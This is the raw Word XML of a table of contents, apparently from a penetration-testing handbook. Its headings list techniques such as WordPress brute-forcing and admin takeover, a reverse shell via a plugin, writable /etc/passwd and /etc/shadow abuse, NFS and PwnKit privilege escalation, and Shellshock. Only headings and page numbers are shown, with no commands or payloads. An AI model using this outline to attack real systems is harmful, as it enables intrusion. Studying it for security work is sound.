        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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q3y40n9ph3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Checking installed cron jobs</w:t>
              <w:tab/>
              <w:t xml:space="preserve">494</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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62olp4aoff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Checking Cron Log files</w:t>
              <w:tab/>
              <w:t xml:space="preserve">497</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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j1wrxwdmh8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Installed Programs Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">499</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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6o4a5hlp2j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Insecure File Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">501</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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40thg3zx14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Unmounted Drives Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">503</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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24iwobk4yc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Kernel Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">504</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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pspbov7i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Kernel Exploitation</w:t>
              <w:tab/>
              <w:t xml:space="preserve">505</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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8htvwcya04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Trail Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">506</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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kka1d9spoj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 footprint enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">508</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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16zzstzlt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systemctl &amp; systemd enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">510</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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b7ulme80ic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Backups</w:t>
              <w:tab/>
              <w:t xml:space="preserve">511</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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pgsh6ewelr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XSS (Cross-Site Scripting)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">511</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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73binu7bn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 XSS Types</w:t>
              <w:tab/>
              <w:t xml:space="preserve">512</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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sq519jszu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CSRF (Cross-Site-Request-Forgery)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">515</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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unuhmwyqzq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XXE (XML External Entity)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">516</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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o2pz1bh9y0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SSTI (Server Side Template Injection)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">521</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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gim39rt5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SSTI is seen</w:t>
              <w:tab/>
              <w:t xml:space="preserve">523</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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v39t2dzaj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SSRF</w:t>
              <w:tab/>
              <w:t xml:space="preserve">523</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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xctn5x38r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SSRF Works</w:t>
              <w:tab/>
              <w:t xml:space="preserve">523</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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ooqp43mms9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WordPress</w:t>
              <w:tab/>
              <w:t xml:space="preserve">526</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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eqs9l319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526</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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sipy9l29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WPScan in general to enumerate and find usernames</w:t>
              <w:tab/>
              <w:t xml:space="preserve">527</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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atjrcreb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WPScan to bruteforce usernames and passwords in WordPress</w:t>
              <w:tab/>
              <w:t xml:space="preserve">528</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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97apvbz1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WPScan to find vulnerable plugins</w:t>
              <w:tab/>
              <w:t xml:space="preserve">530</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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q953r1zw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Admin Privileges using "Editor" and header.php</w:t>
              <w:tab/>
              <w:t xml:space="preserve">533</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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ud4l95m81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using "Theme Editor" and 404.php</w:t>
              <w:tab/>
              <w:t xml:space="preserve">536</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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aql5aykl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Admin Privileges using "Add new" button for plugins</w:t>
              <w:tab/>
              <w:t xml:space="preserve">537</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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oc1dyuos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Admin Privileges using "Plugin Editor" button for plugins</w:t>
              <w:tab/>
              <w:t xml:space="preserve">538</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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dafu14ep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Admin Privileges using AdRotate Plugin</w:t>
              <w:tab/>
              <w:t xml:space="preserve">538</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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dqugp9vl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privilege escalate in Wordpress after getting terminal</w:t>
              <w:tab/>
              <w:t xml:space="preserve">540</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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vjj0wmne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Abuse Backup Migration plugin and Relay Attack for priv esc</w:t>
              <w:tab/>
              <w:t xml:space="preserve">541</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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nu1fo6on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Reset admin password in wordpress_db MySQL database (and technically any other MySQL database)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">546</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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527w0wrsh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add user in wordpress_db MySQL database</w:t>
              <w:tab/>
              <w:t xml:space="preserve">547</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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swbls4v9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reverse shell from Simple File List 4.2.2 (NO AUTHENTICATION)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">548</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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ei6hcu4oi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LFI with Site Editor 1.1.1 plugin</w:t>
              <w:tab/>
              <w:t xml:space="preserve">549</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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712xb90eic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a sudo user if you can edit /etc/sudoers</w:t>
              <w:tab/>
              <w:t xml:space="preserve">549</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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cwm4xjidf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sudo user if you have root privileges (get out of limited shell)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">550</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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jfg1isu64j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add root user if /etc/passwd is writable</w:t>
              <w:tab/>
              <w:t xml:space="preserve">551</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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dblocgvkwb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/etc/passwd</w:t>
              <w:tab/>
              <w:t xml:space="preserve">553</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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wvju090ac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/etc/shadow</w:t>
              <w:tab/>
              <w:t xml:space="preserve">554</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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5miv8yi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exploit /etc/shadow when you can write to it</w:t>
              <w:tab/>
              <w:t xml:space="preserve">556</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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k70bem81tc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Exiftool</w:t>
              <w:tab/>
              <w:t xml:space="preserve">556</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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fg4zyatke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Exiftool vulnerability and cron job</w:t>
              <w:tab/>
              <w:t xml:space="preserve">557</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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l4wv72ffz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Photos</w:t>
              <w:tab/>
              <w:t xml:space="preserve">559</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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48tfjcijo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Command Injection for downloading photos:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">559</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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75oo99wfit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Steganography</w:t>
              <w:tab/>
              <w:t xml:space="preserve">562</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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6ntkoqtzkp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NFS</w:t>
              <w:tab/>
              <w:t xml:space="preserve">562</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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egqexyoj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no_root_squash configuration to priv esc</w:t>
              <w:tab/>
              <w:t xml:space="preserve">564</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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480nv5f8k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Impersonation (editing UID/GID) to read file/directory for NFS</w:t>
              <w:tab/>
              <w:t xml:space="preserve">565</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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0kepk9ks67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Squid proxy (squid-cache)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">567</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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ecplbj2x5q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Shellshock/Bashbug (CGI-Bin)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">571</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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19khz980s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w:t>
              <w:tab/>
              <w:t xml:space="preserve">572</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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dgyxc70k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Root shell using sudo</w:t>
              <w:tab/>
              <w:t xml:space="preserve">573</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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jfkey69z3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pwnkit and polkit (/usr/bin/pwnkit) (CVE-2021-4034)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">573</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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t5pcwcpee7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SNMP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">575</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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fx5bywxt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SNMP Config Files</w:t>
              <w:tab/>
              <w:t xml:space="preserve">575</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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hd6ecmcgn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Explaining all tools (onesixtyone, snmp-brute, snmp-check, snmpbulkwalk, snmpwalk)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">576</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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wml49emx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onesixtyone</w:t>
              <w:tab/>
              <w:t xml:space="preserve">577</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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5k3npju58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snmp-brute</w:t>
              <w:tab/>
              <w:t xml:space="preserve">578</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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vb16ppsth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snmp-check</w:t>
              <w:tab/>
              <w:t xml:space="preserve">579</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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5tzoh1z3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snmpbulkwalk</w:t>
              <w:tab/>
              <w:t xml:space="preserve">580</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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6ifafi2vo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OID</w:t>
              <w:tab/>
              <w:t xml:space="preserve">580</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
